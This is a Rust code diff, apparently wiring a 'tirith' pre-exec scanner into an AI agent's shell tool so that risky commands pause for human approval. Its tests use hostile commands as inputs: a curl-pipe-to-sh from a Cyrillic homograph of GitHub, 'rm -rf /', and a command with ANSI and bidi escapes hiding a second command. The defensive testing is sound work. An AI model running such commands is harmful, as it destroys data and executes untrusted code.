+        assert_eq!(out, "abc");
+    }
+
+    #[test]
+    fn build_reason_sanitizes_ansi_in_finding_text() {
+        // A malicious tirith finding (or, more realistically, the user-
+        // controlled command echoed back into the description) carries an
+        // ANSI sequence. The reason that reaches PendingGate.description /
+        // ApprovalRequested.description must arrive sanitized.
+        let findings = vec![TirithFinding {
+            severity: "HIGH".into(),
+            title: "ansi\x1b[31mPAYLOAD\x1b[0m".into(),
+            description: "trailing\x1b[2J\x1b[H reset".into(),
+            ..Default::default()
+        }];
+        let reason = build_reason(None, &findings, "echo\x1b[31m;rm -rf /\x1b[0m");
+        assert!(!reason.contains('\x1b'), "ESC must not survive: {reason:?}");
+        assert!(
+            reason.contains("PAYLOAD"),
+            "visible text must be preserved: {reason:?}"
+        );
+    }
+
+    #[test]
+    fn build_reason_sanitizes_bidi_in_command() {
+        let reason = build_reason(Some("flagged"), &[], "echo \u{202E}desrever\u{202C} hi");
+        assert!(!reason.contains('\u{202E}'));
+        assert!(!reason.contains('\u{202C}'));
+    }
+
+    #[test]
+    fn build_reason_prefers_approval_description() {
+        let findings = vec![TirithFinding {
+            severity: "HIGH".into(),
+            title: "homograph".into(),
+            description: "Cyrillic in URL".into(),
+            ..Default::default()
+        }];
+        let reason = build_reason(Some("custom description"), &findings, "echo hi");
+        assert!(reason.starts_with("custom description"));
+        assert!(reason.contains("echo hi"));
+    }
+
+    #[test]
+    fn build_reason_falls_back_to_findings() {
+        let findings = vec![TirithFinding {
+            severity: "HIGH".into(),
+            title: "homograph".into(),
+            description: "Cyrillic in URL".into(),
+            ..Default::default()
+        }];
+        let reason = build_reason(None, &findings, "echo hi");
+        assert!(reason.contains("[HIGH]"));
+        assert!(reason.contains("homograph"));
+    }
+
+    #[test]
+    fn build_reason_caps_findings_in_summary() {
+        let mut findings = Vec::new();
+        for i in 0..10 {
+            findings.push(TirithFinding {
+                severity: "HIGH".into(),
+                title: format!("rule-{i}"),
+                ..Default::default()
+            });
+        }
+        let reason = build_reason(None, &findings, "");
+        assert!(reason.contains("rule-0"));
+        assert!(reason.contains("rule-2"));
+        assert!(!reason.contains("rule-3"));
+    }
+
+    #[test]
+    fn build_reason_caps_total_length() {
+        let long_desc = "x".repeat(2000);
+        let reason = build_reason(Some(&long_desc), &[], "");
+        assert!(reason.chars().count() <= REASON_CAP + 1);
+    }
+
+    #[tokio::test]
+    async fn disabled_short_circuits() {
+        let cfg = TirithConfig {
+            enabled: false,
+            ..TirithConfig::default()
+        };
+        let decision = tirith_preflight("shell", &serde_json::json!({"command": "ls"}), &cfg).await;
+        assert!(matches!(decision, TirithPreflightDecision::Allow));
+    }
+
+    #[tokio::test]
+    async fn non_shell_tool_short_circuits() {
+        let cfg = TirithConfig::default();
+        let decision = tirith_preflight("http", &serde_json::json!({"url": "x"}), &cfg).await;
+        assert!(matches!(decision, TirithPreflightDecision::Allow));
+    }
+
+    #[tokio::test]
+    async fn no_command_param_short_circuits() {
+        let cfg = TirithConfig::default();
+        let decision = tirith_preflight("shell", &serde_json::json!({}), &cfg).await;
+        assert!(matches!(decision, TirithPreflightDecision::Allow));
+    }
+}

--- a/src/tools/registry.rs
+++ b/src/tools/registry.rs
@@ -143,6 +143,10 @@ pub struct ToolRegistry {
     /// Active engine version. Controls which tools are visible via
     /// `tool_definitions()`, `all()`, etc. Defaults to V1.
     engine_version: EngineVersion,
+    /// Configuration for the optional Tirith pre-exec scanner. `None` means
+    /// the scanner never runs (preserves the legacy behavior on bare
+    /// registries used in unit tests).
+    tirith_config: Option<crate::tools::builtin::TirithConfig>,
 }
 
 impl ToolRegistry {
@@ -172,6 +176,7 @@ impl ToolRegistry {
             http_interceptor: None,
             message_tool: RwLock::new(None),
             engine_version: EngineVersion::V1,
+            tirith_config: None,
         }
     }
 
@@ -213,6 +218,20 @@ impl ToolRegistry {
     /// Get the active engine version.
     pub fn engine_version(&self) -> EngineVersion {
         self.engine_version
+    }
+
+    /// Attach a [`TirithConfig`](crate::tools::builtin::TirithConfig) so that
+    /// the inline approval call sites can preflight shell tool calls. Bare
+    /// registries (most unit tests) leave this `None`, which short-circuits
+    /// the preflight to `Allow` without spawning anything.
+    pub fn with_tirith_config(mut self, cfg: crate::tools::builtin::TirithConfig) -> Self {
+        self.tirith_config = Some(cfg);
+        self
+    }
+
+    /// Borrow the tirith configuration, if one was attached.
+    pub fn tirith_config(&self) -> Option<&crate::tools::builtin::TirithConfig> {
+        self.tirith_config.as_ref()
     }
 
     /// Get a reference to the shared credential registry.

--- a/tests/engine_v2_gate_integration.rs
+++ b/tests/engine_v2_gate_integration.rs
@@ -269,6 +269,7 @@ impl EffectExecutor for InstallThenAliasEffects {
                 }),
                 paused_lease: None,
                 resume_output: None,
+                reason: None,
             });
         }
 
@@ -347,6 +348,7 @@ impl EffectExecutor for GateMockEffects {
                     resume_kind: Box::new(ResumeKind::Approval { allow_always: true }),
                     paused_lease: None,
                     resume_output: None,
+                    reason: None,
                 });
             }
 
@@ -363,6 +365,7 @@ impl EffectExecutor for GateMockEffects {
                     }),
                     paused_lease: None,
                     resume_output: None,
+                    reason: None,
                 });
             }
         }
@@ -377,6 +380,7 @@ impl EffectExecutor for GateMockEffects {
                 resume_kind: Box::new(ResumeKind::Approval { allow_always: true }),
                 paused_lease: None,
                 resume_output: None,
+                reason: None,
             });
         }
 
@@ -394,6 +398,7 @@ impl EffectExecutor for GateMockEffects {
                 }),
                 paused_lease: None,
                 resume_output: None,
+                reason: None,
             });
         }
 

--- a/tests/engine_v2_skill_codeact.rs
+++ b/tests/engine_v2_skill_codeact.rs
@@ -249,6 +249,7 @@ impl EffectExecutor for PausingHttpMockEffects {
                 }),
                 paused_lease: None,
                 resume_output: None,
+                reason: None,
             });
         }
 

--- a/tests/tirith_preflight.rs
+++ b/tests/tirith_preflight.rs
@@ -1,0 +1,255 @@
+//! Integration tests for `tirith_preflight` and `check_command`.
+//!
+//! These tests spawn a fake `tirith` binary written to a temp directory.
+//! Subprocess execution is Unix-only — Windows would need a `.cmd` /
+//! `.exe` fake-bin variant. The cross-platform `resolve_tirith_bin`
+//! contract is covered by the unit tests inside `src/tools/builtin/tirith_guard.rs`.
+#![cfg(unix)]
+
+use std::os::unix::fs::PermissionsExt;
+use std::path::PathBuf;
+use std::time::Duration;
+
+use ironclaw::tools::builtin::tirith_guard::check_command;
+use ironclaw::tools::builtin::{
+    TirithConfig, TirithPreflightDecision, TirithVerdict, tirith_preflight,
+};
+use tempfile::TempDir;
+
+/// Write a `#!/bin/sh` script that prints `stdout` and exits with `exit`.
+/// Returns (TempDir, absolute path to the script). Drop the TempDir to
+/// clean up.
+fn make_fake_tirith(exit: i32, stdout: &str) -> (TempDir, PathBuf) {
+    let tmp = tempfile::tempdir().expect("tempdir");
+    let path = tmp.path().join("fake-tirith");
+    let script = format!(
+        "#!/bin/sh\ncat <<'EOF'\n{stdout}\nEOF\nexit {exit}\n",
+        stdout = stdout,
+        exit = exit
+    );
+    std::fs::write(&path, script).expect("write");
+    let mut perms = std::fs::metadata(&path).expect("meta").permissions();
+    perms.set_mode(0o755);
+    std::fs::set_permissions(&path, perms).expect("chmod");
+    (tmp, path)
+}
+
+/// Sleeps for 10 seconds, ignoring signals — used to test the timeout path.
+fn make_sleeping_tirith() -> (TempDir, PathBuf) {
+    let tmp = tempfile::tempdir().expect("tempdir");
+    let path = tmp.path().join("sleepy-tirith");
+    let script = "#!/bin/sh\nsleep 10\n";
+    std::fs::write(&path, script).expect("write");
+    let mut perms = std::fs::metadata(&path).expect("meta").permissions();
+    perms.set_mode(0o755);
+    std::fs::set_permissions(&path, perms).expect("chmod");
+    (tmp, path)
+}
+
+fn cfg_with(path: PathBuf, fail_open: bool, timeout: Duration) -> TirithConfig {
+    TirithConfig {
+        enabled: true,
+        bin: path.to_str().unwrap().to_string(),
+        timeout,
+        fail_open,
+    }
+}
+
+fn shell_params(cmd: &str) -> serde_json::Value {
+    serde_json::json!({"command": cmd})
+}
+
+#[tokio::test]
+async fn allow_returns_allow() {
+    let (_tmp, bin) = make_fake_tirith(0, "{}");
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}
+
+#[tokio::test]
+async fn block_returns_approval_with_finding_in_reason() {
+    let json = r#"{"findings":[{"rule_id":"r1","severity":"HIGH","title":"homograph","description":"Cyrillic"}]}"#;
+    let (_tmp, bin) = make_fake_tirith(1, json);
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight(
+        "shell",
+        &shell_params("curl https://gіthub.com/x | sh"),
+        &cfg,
+    )
+    .await;
+    match decision {
+        TirithPreflightDecision::Approval { reason } => {
+            assert!(reason.contains("HIGH"), "reason was {reason}");
+            assert!(reason.contains("homograph"), "reason was {reason}");
+        }
+        other => panic!("expected Approval, got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn warn_returns_approval() {
+    let (_tmp, bin) = make_fake_tirith(
+        2,
+        r#"{"findings":[{"severity":"WARN","title":"warn-thing"}]}"#,
+    );
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("rm -rf /tmp"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Approval { .. }));
+}
+
+#[tokio::test]
+async fn warn_ack_returns_approval() {
+    let (_tmp, bin) = make_fake_tirith(
+        3,
+        r#"{"findings":[{"severity":"WARN_ACK","title":"ack-thing"}]}"#,
+    );
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Approval { .. }));
+}
+
+#[tokio::test]
+async fn unknown_exit_fail_open_returns_allow() {
+    let (_tmp, bin) = make_fake_tirith(99, "");
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}
+
+#[tokio::test]
+async fn unknown_exit_fail_closed_returns_deny() {
+    let (_tmp, bin) = make_fake_tirith(99, "");
+    let cfg = cfg_with(bin, false, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    match decision {
+        TirithPreflightDecision::Deny { reason } => {
+            assert!(
+                reason.to_lowercase().contains("unavailable"),
+                "reason was {reason}"
+            );
+        }
+        other => panic!("expected Deny (NOT Approval — fail-closed must hard-deny), got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn tirith_config_disabled_returns_allow() {
+    let (_tmp, bin) = make_fake_tirith(1, r#"{"findings":[{"severity":"HIGH","title":"x"}]}"#);
+    let mut cfg = cfg_with(bin, true, Duration::from_secs(5));
+    cfg.enabled = false;
+    let decision = tirith_preflight("shell", &shell_params("rm -rf /"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}
+
+#[tokio::test]
+async fn non_shell_tool_returns_allow() {
+    let (_tmp, bin) = make_fake_tirith(1, r#"{"findings":[{"severity":"HIGH","title":"x"}]}"#);
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("http", &serde_json::json!({"url": "x"}), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}
+
+#[tokio::test]
+async fn missing_binary_fail_open_returns_allow() {
+    let cfg = TirithConfig {
+        enabled: true,
+        bin: "/nonexistent/tirith-xyz-abc".into(),
+        timeout: Duration::from_secs(5),
+        fail_open: true,
+    };
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}
+
+#[tokio::test]
+async fn missing_binary_fail_closed_returns_deny() {
+    let cfg = TirithConfig {
+        enabled: true,
+        bin: "/nonexistent/tirith-xyz-abc".into(),
+        timeout: Duration::from_secs(5),
+        fail_open: false,
+    };
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(
+        matches!(decision, TirithPreflightDecision::Deny { .. }),
+        "fail-closed must Deny on missing binary, never Approval"
+    );
+}
+
+#[tokio::test]
+async fn timeout_fail_open_returns_allow() {
+    let (_tmp, bin) = make_sleeping_tirith();
+    let cfg = cfg_with(bin, true, Duration::from_millis(150));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}
+
+#[tokio::test]
+async fn timeout_fail_closed_returns_deny() {
+    let (_tmp, bin) = make_sleeping_tirith();
+    let cfg = cfg_with(bin, false, Duration::from_millis(150));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    assert!(
+        matches!(decision, TirithPreflightDecision::Deny { .. }),
+        "fail-closed must Deny on timeout, never Approval"
+    );
+}
+
+#[tokio::test]
+async fn block_invalid_json_still_returns_approval() {
+    // Exit 1 with garbage body — the helper falls back to a generic reason
+    // built from "tirith flagged a security issue …" rather than panicking.
+    let (_tmp, bin) = make_fake_tirith(1, "not json at all");
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    match decision {
+        TirithPreflightDecision::Approval { reason } => {
+            assert!(
+                reason.to_lowercase().contains("tirith"),
+                "reason was {reason}"
+            );
+        }
+        other => panic!("expected Approval with fallback reason, got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn block_uses_approval_description_when_present() {
+    let json = r#"{"approval_description":"custom blurb from tirith","findings":[]}"#;
+    let (_tmp, bin) = make_fake_tirith(1, json);
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("ls"), &cfg).await;
+    match decision {
+        TirithPreflightDecision::Approval { reason } => {
+            assert!(
+                reason.starts_with("custom blurb from tirith"),
+                "reason was {reason}"
+            );
+        }
+        other => panic!("expected Approval, got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn check_command_block_carries_action_and_findings() {
+    let json = r#"{"findings":[{"rule_id":"r","severity":"HIGH","title":"t","description":"d"}]}"#;
+    let (_tmp, bin) = make_fake_tirith(1, json);
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let verdict = check_command("ls", &cfg).await;
+    match verdict {
+        TirithVerdict::Approvable { findings, .. } => {
+            assert_eq!(findings.len(), 1);
+            assert_eq!(findings[0].severity, "HIGH");
+        }
+        other => panic!("expected Approvable, got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn empty_command_short_circuits_to_allow() {
+    let (_tmp, bin) = make_fake_tirith(1, r#"{"findings":[]}"#);
+    let cfg = cfg_with(bin, true, Duration::from_secs(5));
+    let decision = tirith_preflight("shell", &shell_params("   "), &cfg).await;
+    assert!(matches!(decision, TirithPreflightDecision::Allow));
+}

--- a/tests/tirith_router_description.rs
+++ b/tests/tirith_router_description.rs
@@ -1,0 +1,114 @@
+//! Unit tests for the `EngineError::GatePaused.reason` plumbing through
+//! `ThreadOutcome::GatePaused.reason` and into `PendingGate.description`.
+
+use ironclaw_engine::EngineError;
+use ironclaw_engine::gate::ResumeKind;
+use ironclaw_engine::runtime::messaging::ThreadOutcome;
+
+#[test]
+fn engine_error_gate_paused_carries_reason() {
+    let err = EngineError::GatePaused {
+        gate_name: "approval".into(),
+        action_name: "shell".into(),
+        call_id: "call-1".into(),
+        parameters: Box::new(serde_json::json!({"command": "ls"})),
+        resume_kind: Box::new(ResumeKind::Approval {
+            allow_always: false,
+        }),
+        resume_output: None,
+        paused_lease: None,
+        reason: Some(Box::new(
+            "tirith findings: [HIGH] homograph: Cyrillic char".into(),
+        )),
+    };
+
+    match err {
+        EngineError::GatePaused { reason, .. } => {
+            assert_eq!(
+                reason.as_deref().map(String::as_str),
+                Some("tirith findings: [HIGH] homograph: Cyrillic char")
+            );
+        }
+        other => panic!("expected GatePaused, got {other:?}"),
+    }
+}
+
+#[test]
+fn engine_error_gate_paused_reason_defaults_to_none() {
+    // The existing non-tirith pause path constructs `GatePaused` with
+    // `reason: None`. router.rs:4035's `unwrap_or_else` then falls back to
+    // the generic "Tool 'X' requires Y (gate: Z)" string. This test pins
+    // that contract — if someone changes the field's default behavior they
+    // need to update the router fallback too.
+    let err = EngineError::GatePaused {
+        gate_name: "approval".into(),
+        action_name: "shell".into(),
+        call_id: "call-2".into(),
+        parameters: Box::new(serde_json::json!({})),
+        resume_kind: Box::new(ResumeKind::Approval { allow_always: true }),
+        resume_output: None,
+        paused_lease: None,
+        reason: None,
+    };
+    match err {
+        EngineError::GatePaused { reason, .. } => assert!(reason.is_none()),
+        other => panic!("unexpected variant: {other:?}"),
+    }
+}
+
+#[test]
+fn thread_outcome_gate_paused_carries_reason() {
+    let outcome = ThreadOutcome::GatePaused {
+        gate_name: "approval".into(),
+        action_name: "shell".into(),
+        call_id: "call-3".into(),
+        parameters: serde_json::json!({"command": "rm -rf /"}),
+        resume_kind: ResumeKind::Approval {
+            allow_always: false,
+        },
+        resume_output: None,
+        paused_lease: None,
+        reason: Some(Box::new("tirith blocked".into())),
+    };
+    match outcome {
+        ThreadOutcome::GatePaused { reason, .. } => {
+            assert_eq!(
+                reason.as_deref().map(String::as_str),
+                Some("tirith blocked")
+            );
+        }
+        other => panic!("expected GatePaused, got {other:?}"),
+    }
+}
+
+/// The shape used by `src/bridge/router.rs:4035`:
+/// `reason.as_deref().map(str::to_string).unwrap_or_else(|| format!(...))`.
+/// We can't easily call into router.rs from a workspace integration test
+/// (it depends on a full `BridgeState`), so this test reproduces the
+/// fallback expression locally to lock the contract.
+#[test]
+fn pending_gate_description_uses_reason_when_present() {
+    let reason: Option<Box<String>> = Some(Box::new("tirith finding: rm -rf /".into()));
+    let description = reason.as_deref().cloned().unwrap_or_else(|| {
+        format!(
+            "Tool '{}' requires {} (gate: {})",
+            "shell", "Approval", "approval"
+        )
+    });
+    assert_eq!(description, "tirith finding: rm -rf /");
+}
+
+#[test]
+fn pending_gate_description_falls_back_when_reason_none() {
+    let reason: Option<Box<String>> = None;
+    let description = reason.as_deref().cloned().unwrap_or_else(|| {
+        format!(
+            "Tool '{}' requires {} (gate: {})",
+            "shell", "Approval", "approval"
+        )
+    });
+    assert_eq!(
+        description,
+        "Tool 'shell' requires Approval (gate: approval)"
+    );
+}

--- a/tests/tirith_v2_approval.rs
+++ b/tests/tirith_v2_approval.rs
@@ -1,0 +1,446 @@
+//! Integration tests for the v2 effect-bridge tirith preflight
+//! (`EffectBridgeAdapter::enforce_tool_permission`).
+//!
+//! Per the project's testing conventions (`/.claude/rules/testing.md` —
+//! "Test Through the Caller, Not Just the Helper"), exercises drive
+//! `EffectBridgeAdapter::execute_action()`, the public surface that the
+//! engine v2 ExecutionLoop calls. This pins the invariants of the v2
+//! tirith integration:
+//!
+//! 1. Block / Warn / WarnAck → `EngineError::GatePaused` with `reason: Some(_)`
+//!    and `allow_always = false`.
+//! 2. Fail-closed operational failures → `EngineError::LeaseDenied` (NEVER
+//!    a GatePaused — clicking through fail-closed defeats fail-closed).
+//! 3. `tirith.enabled = false` → tirith is not invoked, the existing v2
+//!    permission logic decides.
+//! 4. Non-shell tools never spawn the subprocess.
+//!
+//! Subprocess-spawning tests are Unix-only via the same fake-bin helper
+//! used by `tests/tirith_preflight.rs`.
+#![cfg(unix)]
+
+use std::os::unix::fs::PermissionsExt;
+use std::path::PathBuf;
+use std::sync::Arc;
+use std::time::Duration;
+
+use async_trait::async_trait;
+use chrono::Utc;
+use tempfile::TempDir;
+
+use ironclaw_engine::types::capability::{
+    ActionDef, ActionDiscoveryMetadata, EffectType, LeaseId, ModelToolSurface,
+};
+use ironclaw_engine::{
+    CapabilityLease, EffectExecutor, GrantedActions, ProjectId, StepId, ThreadExecutionContext,
+    ThreadId, ThreadType,
+};
+
+use ironclaw::bridge::EffectBridgeAdapter;
+use ironclaw::context::JobContext;
+use ironclaw::hooks::HookRegistry;
+use ironclaw::tools::builtin::TirithConfig;
+use ironclaw::tools::{ApprovalRequirement, Tool, ToolError, ToolOutput, ToolRegistry};
+use ironclaw_safety::{SafetyConfig, SafetyLayer};
+
+// ── Fake tirith subprocess helper ──────────────────────────────
+
+fn make_fake_tirith(exit: i32, stdout: &str) -> (TempDir, PathBuf) {
+    let tmp = tempfile::tempdir().expect("tempdir");
+    let path = tmp.path().join("fake-tirith");
+    let script = format!("#!/bin/sh\ncat <<'EOF'\n{stdout}\nEOF\nexit {exit}\n");
+    std::fs::write(&path, script).expect("write");
+    let mut perms = std::fs::metadata(&path).expect("meta").permissions();
+    perms.set_mode(0o755);
+    std::fs::set_permissions(&path, perms).expect("chmod");
+    (tmp, path)
+}
+
+fn cfg_with(path: PathBuf, fail_open: bool) -> TirithConfig {
+    TirithConfig {
+        enabled: true,
+        bin: path.to_str().unwrap().to_string(),
+        timeout: Duration::from_secs(5),
+        fail_open,
+    }
+}
+
+// ── Mock tools ─────────────────────────────────────────────────
+
+/// Minimal "shell" stand-in. `requires_approval = Never` so we can
+/// distinguish a tirith-driven pause (we want) from the standard
+/// always-approval path (we don't).
+struct MockShell;
+
+#[async_trait]
+impl Tool for MockShell {
+    fn name(&self) -> &str {
+        "shell"
+    }
+    fn description(&self) -> &str {
+        "Mock shell for tirith v2 wiring tests"
+    }
+    fn parameters_schema(&self) -> serde_json::Value {
+        serde_json::json!({
+            "type": "object",
+            "properties": {"command": {"type": "string"}},
+            "required": ["command"]
+        })
+    }
+    async fn execute(
+        &self,
+        _params: serde_json::Value,
+        _ctx: &JobContext,
+    ) -> Result<ToolOutput, ToolError> {
+        Ok(ToolOutput::text("ran", Duration::from_millis(1)))
+    }
+    fn requires_approval(&self, _params: &serde_json::Value) -> ApprovalRequirement {
+        ApprovalRequirement::Never
+    }
+}
+
+/// Non-shell tool. Tirith should never spawn for this name.
+struct MockHttp;
+
+#[async_trait]
+impl Tool for MockHttp {
+    fn name(&self) -> &str {
+        "http"
+    }
+    fn description(&self) -> &str {
+        "Mock http for non-shell short-circuit"
+    }
+    fn parameters_schema(&self) -> serde_json::Value {
+        serde_json::json!({
+            "type": "object",
+            "properties": {"url": {"type": "string"}}
+        })
+    }
+    async fn execute(
+        &self,
+        _params: serde_json::Value,
+        _ctx: &JobContext,
+    ) -> Result<ToolOutput, ToolError> {
+        Ok(ToolOutput::text("ran", Duration::from_millis(1)))
+    }
+    fn requires_approval(&self, _params: &serde_json::Value) -> ApprovalRequirement {
+        ApprovalRequirement::Never
+    }
+}
+
+// ── Adapter scaffolding ────────────────────────────────────────
+
+async fn make_adapter(tirith_cfg: Option<TirithConfig>) -> Arc<EffectBridgeAdapter> {
+    let mut registry = ToolRegistry::new();
+    if let Some(cfg) = tirith_cfg {
+        registry = registry.with_tirith_config(cfg);
+    }
+    registry.register(Arc::new(MockShell)).await;
+    registry.register(Arc::new(MockHttp)).await;
+    Arc::new(EffectBridgeAdapter::new(
+        Arc::new(registry),
+        Arc::new(SafetyLayer::new(&SafetyConfig {
+            max_output_length: 100_000,
+            injection_check_enabled: false,
+        })),
+        Arc::new(HookRegistry::default()),
+    ))
+}
+
+fn make_lease(thread_id: ThreadId, action: &str) -> CapabilityLease {
+    CapabilityLease {
+        id: LeaseId::new(),
+        thread_id,
+        capability_name: "tirith.test".into(),
+        granted_actions: GrantedActions::Specific(vec![action.into()]),
+        granted_at: Utc::now(),
+        expires_at: None,
+        max_uses: None,
+        uses_remaining: None,
+        revoked: false,
+        revoked_reason: None,
+    }
+}
+
+fn make_context(project_id: ProjectId) -> ThreadExecutionContext {
+    ThreadExecutionContext {
+        thread_id: ThreadId::new(),
+        thread_type: ThreadType::Foreground,
+        project_id,
+        user_id: "tirith-test-user".into(),
+        step_id: StepId::new(),
+        current_call_id: Some("call_tirith_test_1".into()),
+        source_channel: None,
+        user_timezone: None,
+        thread_goal: None,
+        available_actions_snapshot: None,
+        available_action_inventory_snapshot: None,
+    }
+}
+
+fn shell_params(cmd: &str) -> serde_json::Value {
+    serde_json::json!({"command": cmd})
+}
+
+// ── Tests ──────────────────────────────────────────────────────
+
+#[tokio::test]
+async fn block_pauses_v2_with_reason_and_allow_always_false() {
+    let (_tmp, bin) = make_fake_tirith(
+        1,
+        r#"{"findings":[{"rule_id":"r1","severity":"HIGH","title":"homograph"}]}"#,
+    );
+    let adapter = make_adapter(Some(cfg_with(bin, true))).await;
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    let err = adapter
+        .execute_action("shell", shell_params("ls"), &lease, &ctx)
+        .await
+        .expect_err("tirith block must produce a GatePaused");
+
+    match err {
+        ironclaw_engine::EngineError::GatePaused {
+            reason,
+            resume_kind,
+            ..
+        } => {
+            let r = reason.expect("tirith pause must carry a reason");
+            assert!(r.contains("HIGH") || r.contains("homograph"), "reason: {r}");
+            assert!(matches!(
+                *resume_kind,
+                ironclaw_engine::ResumeKind::Approval {
+                    allow_always: false
+                }
+            ));
+        }
+        other => panic!("expected GatePaused, got {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn fail_closed_missing_binary_denies_in_v2() {
+    let cfg = TirithConfig {
+        enabled: true,
+        bin: "/nonexistent/tirith-xyz-abc".into(),
+        timeout: Duration::from_secs(5),
+        fail_open: false,
+    };
+    let adapter = make_adapter(Some(cfg)).await;
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    let err = adapter
+        .execute_action("shell", shell_params("ls"), &lease, &ctx)
+        .await
+        .expect_err("fail-closed missing binary must error");
+
+    assert!(
+        matches!(err, ironclaw_engine::EngineError::LeaseDenied { .. }),
+        "fail-closed must deny via LeaseDenied — clicking through GatePaused defeats fail-closed; got {err:?}"
+    );
+}
+
+#[tokio::test]
+async fn tirith_config_disabled_does_not_invoke_subprocess() {
+    // Bin would Block if invoked. With cfg.enabled = false the subprocess
+    // is never spawned and the existing v2 permission logic decides — for
+    // a `requires_approval = Never` tool with default `AskEachTime`
+    // permission this surfaces as a standard approval gate (not a tirith
+    // pause), which is what we want to assert.
+    let (_tmp, bin) = make_fake_tirith(1, r#"{"findings":[{"severity":"HIGH","title":"x"}]}"#);
+    let mut cfg = cfg_with(bin, true);
+    cfg.enabled = false;
+    let adapter = make_adapter(Some(cfg)).await;
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    // For a Never-approval tool, default permission resolution lands on
+    // AskEachTime and (without any auto-approve) gate-pauses with the
+    // GENERIC reason — not tirith's. The contract: `reason.is_none()`.
+    let result = adapter
+        .execute_action("shell", shell_params("ls"), &lease, &ctx)
+        .await;
+
+    if let Err(ironclaw_engine::EngineError::GatePaused { reason, .. }) = &result {
+        assert!(
+            reason.is_none(),
+            "tirith disabled must not produce a tirith reason; got {reason:?}"
+        );
+    }
+    // Either Ok or generic GatePaused is acceptable — both prove tirith
+    // never produced its rich reason.
+}
+
+#[tokio::test]
+async fn non_shell_tool_does_not_spawn_tirith() {
+    // Bin path points at a directory that would error if anyone tried to
+    // exec it. The helper short-circuits on `tool_name != "shell"` BEFORE
+    // resolving the binary, so this should still succeed (or land in
+    // standard permission logic, not tirith).
+    let cfg = TirithConfig {
+        enabled: true,
+        bin: "/this/path/would/error/if/spawned".into(),
+        timeout: Duration::from_secs(5),
+        fail_open: false, // makes a tirith spawn fail loudly (LeaseDenied)
+    };
+    let adapter = make_adapter(Some(cfg)).await;
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "http");
+
+    let result = adapter
+        .execute_action("http", serde_json::json!({"url": "x"}), &lease, &ctx)
+        .await;
+
+    // Specifically must NOT be `LeaseDenied { reason: contains "Tirith unavailable" }`.
+    if let Err(ironclaw_engine::EngineError::LeaseDenied { reason }) = &result {
+        assert!(
+            !reason.to_lowercase().contains("tirith"),
+            "non-shell tool must not invoke tirith; got reason: {reason}"
+        );
+    }
+}
+
+#[tokio::test]
+async fn no_tirith_config_runs_normal_permission_logic() {
+    // Registry built without `with_tirith_config(...)`. The preflight
+    // helper short-circuits on `self.tools.tirith_config()` returning
+    // None and never spawns.
+    let adapter = make_adapter(None).await;
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    let result = adapter
+        .execute_action("shell", shell_params("ls"), &lease, &ctx)
+        .await;
+
+    if let Err(ironclaw_engine::EngineError::GatePaused { reason, .. }) = &result {
+        assert!(
+            reason.is_none(),
+            "no tirith config must not produce a tirith reason; got {reason:?}"
+        );
+    }
+}
+
+#[tokio::test]
+async fn allow_lets_call_proceed_through_v2() {
+    // Tirith exit 0 => Allow. Combined with `requires_approval = Never`
+    // and `AskEachTime` permission default, the only way the call still
+    // gate-pauses is the standard ask-each-time gate. To isolate the
+    // tirith-Allow contract we use `with_global_auto_approve(true)` so
+    // the post-tirith standard gate clears too — leaving an actual `Ok`
+    // ActionResult that proves both tirith ran AND let the call proceed.
+    let (_tmp, bin) = make_fake_tirith(0, "{}");
+    let registry = ToolRegistry::new().with_tirith_config(cfg_with(bin, true));
+    registry.register(Arc::new(MockShell)).await;
+    let adapter = EffectBridgeAdapter::new(
+        Arc::new(registry),
+        Arc::new(SafetyLayer::new(&SafetyConfig {
+            max_output_length: 100_000,
+            injection_check_enabled: false,
+        })),
+        Arc::new(HookRegistry::default()),
+    )
+    .with_global_auto_approve(true);
+    let ctx = make_context(ProjectId::new());
+    let lease = make_lease(ctx.thread_id, "shell");
+
+    let result = adapter
+        .execute_action("shell", shell_params("ls"), &lease, &ctx)
+        .await
+        .expect("tirith-allow + global auto-approve should let the call proceed");
+    assert!(!result.is_error, "expected Ok result, got: {:?}", result);
+}
+
+#[tokio::test]
